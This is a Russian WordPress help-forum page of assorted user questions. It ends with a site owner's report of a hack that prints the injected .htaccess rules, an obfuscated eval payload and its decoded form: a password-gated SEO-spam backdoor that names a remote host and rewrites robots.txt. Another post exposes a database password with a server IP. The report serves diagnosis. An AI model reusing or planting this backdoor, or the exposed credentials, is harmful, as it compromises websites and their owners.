Сайт закрыт от индексации тегом noindex насколько я понимаю. Но я не вижу его не в хедере, не в футере, не в functions.php. Помогите пожалуйста открыть сайт для индексирования.
Заранее очень признателен вам!
Сайт: https://cuckold-secrets.tk
Что-то не работает? Сайт не загружается? Сломалось. Пиши сюда.
Сайт закрыт от индексации тегом noindex. Помогите найти
Сайт закрыт от индексации тегом noindex насколько я понимаю. Но я не вижу его не в хедере, не в футере, не в functions.php. Помогите пожалуйста открыть сайт для индексирования.
Заранее очень признателен вам!
Сайт: https://cuckold-secrets.tk
Доброго времени суток! Стали исчезать некоторые медиафайлы, в частности PDF. Ссылки вроде бы как есть, но в результате – ошибка 404 (К сожалению, запрашиваемая страница не существует). В библиотеке медиафайлов их тоже нет, хотя 100% не удалялись. Помогите пожалуйста!!!
Всем здравствуйте! Пожалуйста, помогите! У меня проблема при редактировании сайта на WordPresse, во вкладке новости добавляла новые блоки (картинка с текстом) все сделала по размерам, но, когда публикую там эти вкладки не выходят и предыдущие вкладки разбросаны становятся. Надеюсь на ваши полезные советы, так, как здесь уже профессионалы…))))
в пути к favicon смешанный контент
в браузере показывает, что путь к favicon содержит смешанный контент http, хотя сайт имеет сертификат ssl – www.happyresume.ru
<?php
// Your code here
?>
<?php
// Your code here
?>
Ошибка при переадресации с http:// на https://
Добрый день.
На сайте после удаления переводчика gtranslate появилась такая вот проблема:
при переадресации с https://tto-studio.com.ua/ на http://tto-studio.com.ua/ru/ вылетает такая вот страница <strong>https://tto-studio.com.ua/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=ru&gurl=</strong>
Что мне делать, как это можно исправить?
Как сделать открывание товара с 1го нажатия
Всем привет, подскажите га теме воодмарт , вооклмерс, товары открываются с 2х нажатий на андроиде, а на айфоне вообще надо нажимать 3 раза, как сделать с одного нажатия? Www.Kyivcraft.com.ua
Error establishing a database connection при установке
При установке WordPress по <a href=”https://serveroid.com/ru/kb/wordpress-on-ubuntu.html”>инфе</a>:CREATE DATABASE wordpress;CREATE USER wordpressuser@localhost IDENTIFIED BY ‘QW12er#$’;GRANT ALL PRIVILEGES ON wordpress.* TO ‘wordpressuser’@’localhost’;FLUSH PRIVILEGES;При запуске <a href=”http://217.107.217.56/wordpress/wp-admin/install.php”>http://217.107.217.56/wordpress/wp-admin/install.php</a> получаю сообщение об ошибке: Error establishing a database connection. По проверке базы в терминале получаю успех:SHOW GRANTS FOR ‘wordpressuser’@’localhost’; http://ipic.su/img/img7/fs/kiss_29kb.1661412417.jpg Базу в wp-config.php прописал так:define(‘DB_NAME’, ‘wordpress’);define(‘DB_USER’, ‘wordpressuser’);define(‘DB_PASSWORD’, ‘QW12er#$’);виртуальный хост в apache-e:/etc/apache2/sites-available/wordpress.conf<VirtualHost *:80> DocumentRoot /var/www/html/wordpress/ ServerName example.com ErrorLog /var/log/apache2/wordpress_error.log CustomLog /var/log/apache2/wordpress_access.log common <Directory /var/www/html/wordpress> Options FollowSymLinks Options +Indexes AllowOverride All Order allow,deny Allow from all </Directory></VirtualHost>ln -s /etc/apache2/sites-available/wordpress.conf /etc/apache2/sites-enabled//etc/init.d/apache2 reloadchown -R www-data:root /var/www/html/wordpressПрошу проверить, прошу помочь разобраться.
Здравствуйте. Дря моего сайта russkijmetall.ru нанял фрилансера обновить ВП и плагины, результат – подтормаживает сайт. Фрилансер то про завирусованный мой браузер, то про vds для моих десятков посетителей в сутки. Второй проверяющий фриласер немного по-другому хочет сделать. Сейчас пока поставил бекап сайта от 8 июля.
Прошу помочь разобраться. Спасибо.
Ниже привожу переписку с первым и вторым фрилансером.
Ниже привожу переписку с первым фрилансером и анализ второго.
Роман Петров
1) Обновил все плагины (WP уже последней версии)
2) Вместо WP Fastest Cache Premium установил и настроил WP Rocket, который работает быстрее
3) Проверил настройки безопасности и удалил ненужные плагины, в том числе дублирующиеся.
4) Скорость увеличилась с 51 и 95 баллов до 58 и 99 баллов.
08.08.22 13:58
Роман Петров
Загружен файл:
2022-08-06_23-12-26.png
08.08.22 23:11
Виталий Русанов
Прошу перечень удаленных плагинов.
08.08.22 23:14
Виталий Русанов
Утром писал запрос, и мгновенно заходил с яндекса на главную. Сейчас страница несколько секунд грузилась,
08.08.22 23:23
Роман Петров
Добрый вечер, список удаленных плагинов не вел, там были три плагина на кэширование, и еще пару, точно не задействованных в работе сайта.
08.08.22 23:26
Роман Петров
Что касается скорости. На выходных как и писал я ускорил сайт путем кэширования через WP Rocket.
Он дает мгновенный заход на страницу если вы не залогинены в админке. Но в случае если вы вошли, то загрузку тормозило построение меню.
Сегодня я переписал вызовы меню, чтобы тяжелых запросов было меньше. Но пришлось пожертвовать расхлопыванием меню справа.
Скорость выросла в 4 раза: загрузка снизилась с 4,6 секунды до 1,2 с (высылаю на скриншотах).
08.08.22 23:26
Роман Петров
Загружен файл:
2022-08-08_21-49-37.png
08.08.22 23:26
Роман Петров
Загружен файл:
2022-08-08_22-42-17.png
08.08.22 23:33
Роман Петров
Как видите, устранено 34 медленных запроса. Теперь сайт грузится быстро и при логине в админке.
Если вдруг расхлопывание Меню справа нам необходимо, то есть два варианта:
1) Вернуть исходный код правого меню (я сохранил резервные копии) — тогда время загрузки главной страницы для залогиненного пользователя увеличится в два раза до 2,8 секунды.
2) Переделать структуру сайта (с сохранением URL-путей), чтобы каталог был в специальном каталоге, а не в корне в Страницах наряду со страницами “О нас”, “Схема проезда” и так далее.
Сейчас, повторюсь, на сайте страницы продукции реализованы неправильно: без отдельного каталога.
08.08.22 23:34
Роман Петров
Загружен файл:
2022-08-08_23-33-53.png
08.08.22 23:40
Роман Петров
По плагинам вспомнил: Webcraftic Clearfy (очень вредный плагин, который ломает работу сайта) и Search Regex (плагин для разработчика, который не нужен для дальнейшей работы сайта)
09.08.22 12:53
Виталий Русанов
Лисой захожу с яндекса на главную, полная загрузка крутится секунд 15. От чего так?
09.08.22 12:56
Виталий Русанов
перешел на страницу О нас – бесконечно круг загрузки крутится на закладке.
09.08.22 13:34
Роман Петров
Проверил в Firefox — сайт быстро грузится, также как и в Chrome.
Предположу, что либо у вас завирусился браузер, либо плагины какие-то тормозят его работу.
Можно попробовать в приватной (инкогнито) вкладке открыть, тогда плагины будут отключены.
09.08.22 13:36
Роман Петров
Версия Firefox последняя: 103.0.1 (64 бита)
09.08.22 13:52
Виталий Русанов
Это хорошо что у вас все хорошо, я понял это с первого раза. В то утро до манипуляций сайт летал. Сейчас – как на видео (ябраузер) и дело не в браузере. Никакой заходящий не будет настраивать свой браузер для захода ко мне.
09.08.22 13:53
Виталий Русанов
другие сайты летают – Вики открыл
09.08.22 13:58
Виталий Русанов
“завирусился” – это у нас теткам в бухгалтерии говорят обычно
09.08.22 13:59
Виталий Русанов
кеша браузера очистка – тоже все самое
09.08.22 14:01
Роман Петров
1:05
До начала работ в пятницу сайт грузился дольше 5 секунд, сейчас он грузится 1 секунду. В этом и есть увеличение скорости.
Если на каких-то машинах он грузится дольше, то это проблема машины. Проверьте, пожалуйста, на другом компьютере. Сам сайт легкий, а проблемы в движке и теме сайта, вызывавшие долгую загрузку, устранены.
Записал видео чтобы было видно наглядно высокую скорость загрузки:
09.08.22 14:03
Виталий Русанов
концепция переделки тут не нужна. Всегда все пытались переделать – результат один, как сейчас, тормозит сайт. Всегда помогал WP Fastest Cache Premium.Сайт так организован, лучше оптимизировать как есть, а не переделывать.
09.08.22 14:06
Виталий Русанов
Зачем мне видео? Мне надо чтобы он работал быстро и у меня. И при настройке нормальной он работал годами. 5 с страница, это он в последнее время грузится. Сейчас стал по 25 сек. Никакой другой сайт так не грузится на это завирусованной машине.
09.08.22 14:08
Виталий Русанов
Загружен файл: whatsapp video 2022-08-09 at 13.44.34.mp4
09.08.22 14:15
Виталий Русанов
могу любой интернетомер пройти, показать
09.08.22 14:17
Виталий Русанов
сейчас в лисе повторно с яндекса главная резво загрузилась, видно кеш браузера помогает, на новую другую страницу захожу долго. Никогда так не было.
09.08.22 14:18
Виталий Русанов
Прошу не спешить и разобраться. Лучше вернуть пока сайт в изначальное положение.
09.08.22 14:46
Роман Петров
На вашем видео действительно грузится 15 секунд. При этом выполнен логин в админку, а значит страница грузится без кэша. В этом случае она должна грузиться до 3 секунд. Википедия скорей всего уже закэширована в браузере, поэтому грузится с вашего компьютера минуя сеть.
Проблема долгой загрузки когда исключены проблемы с сайтом может быть по нескольким причинам:
1) Проблемы на хостинге (если загрузка неравномерная, то быстрая то медленная)
2) Проблемы у локального провайдера интернета (ниже тест скорости и пинга)
3) Проблемы на компьютере (здесь рекомендую проверить с другого компьютера, так как искать вирусы или переустанавливать ОС займет много времени)
могу любой интернетомер пройти, показать
https://www.speedtest.net/ пройдите и вышлите скриншот.
09.08.22 14:51
Роман Петров
В изначальном положении он грузится дольше ( 5 секунд), поэтому рекомендую оставить текущую версию.
09.08.22 14:55
Роман Петров
Чтобы исключить хостинг, просьба делать скриншот панели Query Monitor в тот момент когда загружалось долго.
09.08.22 14:55
Роман Петров
Загружен файл:
2022-08-08_22-42-17.png
09.08.22 15:07
Роман Петров
Отключил тяжелый плагин, теперь грузится еще быстрее. Он мог вызывать тормоза, помониторьте как работает сейчас.
09.08.22 15:11
Виталий Русанов
стало быстрее
09.08.22 15:15
Виталий Русанов
прошу еще все пересмотреть и перепроверить
09.08.22 15:15
Виталий Русанов
вечером буду на месте
09.08.22 15:16
Виталий Русанов
с админкой что-то совсем долго
09.08.22 15:22
Роман Петров
Сейчас у нас два плагина на вывод похожих статей, ищу какой лишний.
09.08.22 15:35
Роман Петров
Он используется в новостях. Оставляем.
Удаляю Simple Custom Post Order — на сайте на данный момент не используются записи типа Custom Post, поэтому сортировка для них не нужна.
09.08.22 15:36
Роман Петров
Еще PB SEO Friendly Images — бестолковый плагин. Надо руками прописывать alt для изображений при SEO-оптимизации. Он только хуже делает. Предлагаю удалить.
09.08.22 15:46
Роман Петров
Загружен файл:
2022-08-09_15-45-58.png
09.08.22 15:46
Роман Петров
Загружен файл:
2022-08-09_15-45-46.png
09.08.22 15:51
Роман Петров
Виталий, подтвердилась очень долгая загрузка. Это 100% проблема хостинга. При долгом браузинге и учитывая часы пика сайт стал виснуть.
Выше скинул скриншоты: зависает именно сервер, рендеря скрипт дольше 6 секунд. А на втором вылетел в 502, то есть nginx не справился с посетителями.
Настоятельно рекомендую переезд на VPS (сейчас это обычный шаред, когда на одном сервере размещены сотни сайтов).
По стоимости 800 рублей в месяц и первоначальная настройка 5000 с переносом данного сайта.
10.08.22 00:25
Виталий Русанов
Переехать то можно, только на сайте около 100 человек всего посетителей.
10.08.22 00:38
Роман Петров
На сайте 100, а на сервере, где он размещен десятки и сотни тысяч. В перспективе можно и другие сайты на VPS перенести.
Как бы то ни было, проблема спонтанно возникающих тормозов в хостинге. Предлагаю это решение.
1:05
ну, частично он может и прав, что проблема в хостинге(сервере). Обычно такие проблемы бывают из-за перегруженного сервера хостинга https://clip2net.com/s/4glT7px по консоли видно, как даже не подгрузились картинки.1:18
Но, он отмечает плагин кэширования WP-Roket, к сожалению, в моем опыте – это ужасный плагин, от которого не поймешь, как избавиться от закэшированных страниц и что именно он закешировал и когда. Я тоже для оптимизации использую Wp Faster Cache Premium1:19
ну а по факту, если мне память не изменяет, я на момент, когда откликался на заказ, смотрел показатели сайта и они для моб составляли на уровне 70, в то время, как сейчас 53 https://clip2net.com/s/4glT92l1:21
самый простой сценарий проверки, чья теория верна – это откатываемся до бэкапа, когда еще не проводилась работа. Я надеюсь бекап делался и можно легко вернуться все, как и было. Также делаем бекап сейчас проделанной работы и просто “откладываем” ее. Восстанавливаем бекап – и сразу же в моменте проверяем скорость сайта. Если скорость стала выше, чем после проделанных работ – значит проблем в проделанных работах. Но это в целом наверное ему разбираться, ну либо мне будете вдвойне переплачивать, потому как человек получил 15тыс. за кривую работу, а я буду всю схему разбирать в районе 3 тыс. )) Теорию я вам описал, все достаточно просто, упаковуем его работу, заливаем до и сразу сверяем скорость и легко определяем правда ли проблема в хостинге.1:25
а вот сделал проверку не под админкой и вот так выдает https://clip2net.com/s/4glTfnV1:37
avatar
но сайт грузится через раз, одинаковые страницы грузится одна быстро, другая очень долго. Проблема либо в хостинге, либо в плагине Wp Roket, так как отметил, у меня он всегда доставлял проблем, как и WP Super Cache.
Выдаёт ошибку белый экран при входе в админ панель
Не могу войти в админ панель. Выдаёт ошибку На сайте возникла критическая ошибка, пытался включить дебаг но всё равно ничего не выдаёт. Сам сайт работает без проблем но в админ панель не получается войти. Может кто нибудь помочь
Я разработал сайт на WordPress
https://www.astlaw.co.il/ . Суть проблемы в следующем. Клиент при создании постов, вставляет текст из сторонних сайтов.
В код каким то образом попадает чужая html разметка. Периодически это ломает страницы.
Еще на двух других проектах похожая ситуация.
Как решить это раз и навсегда? Может кто то сталкивался.
Добрый день. Можете ли вы помочь для того чтобы вставить аудио точно так же как на фотографии, чтобы он был в правом боку сайта на любой странице, а треки в виде url адреса
Здравствуйте.Проблема с сайтом на WordPress. Постоянная атака, каким-то образом ставят птичку в настройках: регистрация пользователя как админа, и регистрируют новых пользователей как админов. Ставлю блок на admin через хостинг, убираю галочку с настроек, меняю все пароли. Но каким-то образом опять регистрируются. Помогите понять как, и как можно защитить сайт?
Не работает ссылка с баннера сайта.
Ранее токой проблемы не было, а сейчас, при нажатии на баннер, открывается окно, что небезопасный ресурс и опять открывается сайт. Где то ошибка в коде, но где- не знаю смотреть. Подскажите, плз!
сайт https://today-press.ru/ – слева и внизу баннеры. Работает только верхний.
Плагины для сайта с системой поддоменов
Добрый день! Планируется создать сайт, чтобы
человек при переходе с конкретного города попадал на соответствующий поддомен,
ну то бишь москва точка сайт точка ру грубо говоря. Естественно на каждой такой
странице потребуется заменять заголовки, а в идеале ещё и текст. Заранее
заполнять текст вручную даже на 100 городов будет весьма трудоёмко. По этому и
пришёл к Вам с вопросом: Какие плагины и решения посоветуете, чтобы это можно
было реализовать?
Как натянуть вторую страницу на wp
Здравствуйте,
Как натянуть ещё страницы на wp?
Я создал новую тему, закинул туда файлы сайта и поправил ссылки на css, я не нашёл инфы как натянуть следующую страницу этого же сайта. Например страницу О_НАС.
Как подключить header к второй странице (о нас)
Так же как сделать ссылки в header на эти страницы.
Пожалуйста помогите не могу разобраться.
Всем привет. Я здесь новенький, никогда не работал с вордпрес, сделал лишь однажды 1 сайт на wix. Теперь решил перенести его на WordPress, по разным причинам. И столкнулся с тем, что очень не понятно меню и вообще все управление. Но ладно, пытаюсь разобраться.Не получается сделать несколько вещей, поэтому решил уже просить помощи.Выбрал тему, и пытаюсь убрать все виджеты справа, на фото снизу, не получается. Это вообще возможно?В целом, я могу на любой теме повторить сайт который нужен мне?, или я должен найти максимально похожую тему?Сразу скажу, это не работа для меня, просто помогаю, сам хожу в море.
Доброго дня, товарищи.
Утром ошарашил клиент – отхлебнула админка, попросил посмотреть.
Собственно, заглянул – и правда. Не грузятся стили, разделы не работают.
Полез в логи – а их нет (спасибо тебе, Бегет, за отключенные по дефолту логи), так что пришлось разбираться ручками.
Собственно, 10.01 примерно в 12.32 по МСК были модифицированы файлы index.php, wp-admin/edit.php, wp-admin/index.php, и ещё с десяток других.
К тому же в каждую директорию был добавлен .htaccess следующего содержания:
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|load.php|xmlrpcs.php|container.php|entity.php|header.php|style.php|constant.php|access.php|locale.php|uninstall.php|themes.php|wp-login.php|scindex.php|admin.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
В зараженные PHP было всунуто следующее:
<?php
$x = "'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'";$a = base64_decode($x);$b = gzinflate($a);eval($b);
?>
В деобфусцированном виде:
<?php
error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$xmlname = 'mapss.xml';$dt = 0;$sitemap_file = 'sitemap';$mapnum = 2000;if(isset($_GET['dt'])){ $dt = $_GET['dt'];}$site = @$_GET['smsite'];$jdir = '';$http_web = 'http';if(is_https()){ $http = 'https';}else{ $http = 'http';}$smuri_tmp = smrequest_uri();$uri_script = "";if(strstr($smuri_tmp, ".php") && !$site){ $uri_arr = explode(".php", $smuri_tmp); $uri_script = $uri_arr[0].".php?"; $smuri_tmp = $uri_arr[1]; $smuri_tmp = str_replace("?", "/", $smuri_tmp);}if($smuri_tmp==''){ $smuri_tmp='/';}$s = 'b'.'ase6'.'4_e'.'ncode';$smuri = $s($smuri_tmp);function smrequest_uri(){ if (isset($_SERVER['REQUEST_URI'])){ $smuri = $_SERVER['REQUEST_URI']; }else{ if(isset($_SERVER['argv'])){ $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0]; }else{ $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } } return $smuri;}@$action = $_GET['ac']?$_GET['ac']:"";if($action != "" && $action == "write"){ write(); echo "write done!"; exit();}$temp = @$_GET['smtemp'];$id = @$_GET['smid'];$page = @$_GET['smpage'];$site = str_replace('/','',$site);$host = $_SERVER['HTTP_HOST'];$clock = '';
$tempweb = @$_GET['tempweb'];$tempweb = str_replace('/','',$tempweb);
if(preg_match('@pingsitemap.xml@i',$smuri_tmp)){ @header("Content-type: text/css; charset=utf-8"); if($uri_script == ""){$uri_script="/";} $sitemap = "https://www.google.com/ping?sitemap=$http://$host$uri_script"."sitemap.xml"; $contents = get($sitemap); if(strpos($contents, "Sitemap Notification Received")){ echo "Submitting Google Sitemap $http://$host$uri_script"."sitemap.xml"." : OK!<br>"; }else{ echo "Submitting Google Sitemap $http://$host$uri_script"."sitemap.xml"." : ERROR!<br>"; } $mnum = mt_rand(30, 80); for($i = 0; $i < $mnum; $i++){ $sitemap = "https://www.google.com/ping?sitemap=$http://$host$uri_script"."sitemap$i.xml"; $contents = get($sitemap); if(strpos($contents, "Sitemap Notification Received")){ echo "Submitting Google Sitemap $http://$host$uri_script"."sitemap$i.xml"." : OK!<br>"; }else{ echo "Submitting Google Sitemap $http://$host$uri_script"."sitemap$i.xml"." : ERROR!<br>"; } } exit;}
$goweb = 'seo55.herosolid.online';$password = md5(md5(@$_GET['pd']));if ($password == '5fbf36f6b1070aec65f00cb8e35c9cc4') { $add_content = @$_GET['mapname']; $action = @$_GET['action']; $domain = @$_GET['domain']; if($domain){ $host = $domain; }else{ $host = $_SERVER['HTTP_HOST']; } //$host = $_SERVER['HTTP_HOST']; $path = dirname(__FILE__);
$file_path = $path.'/robots.txt'; if(!$action){ $action = 'put'; } if($action == 'put'){ $data = 'User-agent: *Allow: /'; $uri_script = trim($uri_script); if( $uri_script!= "" && $uri_script!="/index.php?"){ $data = trim($data)."\r\n"."Sitemap: $http://".$host.$uri_script."sitemap.xml"; }else{ $data = trim($data)."\r\n"."Sitemap: $http://".$host."/sitemap.xml"; } $num = mt_rand(5, 10); for($i = 0; $i<$num; $i++){ if(trim($uri_script) != "" && $uri_script!="/index.php?"){ $data = trim($data)."\r\n"."Sitemap: $http://".$host.$uri_script."sitemap$i.xml"; }else{ $data = trim($data)."\r\n"."Sitemap: $http://".$host."/sitemap$i.xml"; } } @chmod("robots.txt", 0755); file_put_contents("robots.txt", $data); echo "robots write done!!"; } if($action == 'del'){ if(file_exists($file_path)){ $data = smoutdo($file_path); }else{ $data = ''; } if(strstr($data,'/'.$add_content)){ if(is_https()){ $data_new = trim($data)."\r\n".'Sitemap: https://'.$host.'/'.$add_content; }else{ $data_new = trim($data)."\r\n".'Sitemap: http://'.$host.'/'.$add_content; } if(file_put_contents($file_path,$data_new)) { echo '<br>ok<br>'; }else{ echo '<br>file write false!<br>'; } }else{ echo '<br>sitemap does not exist!<br>'; } }
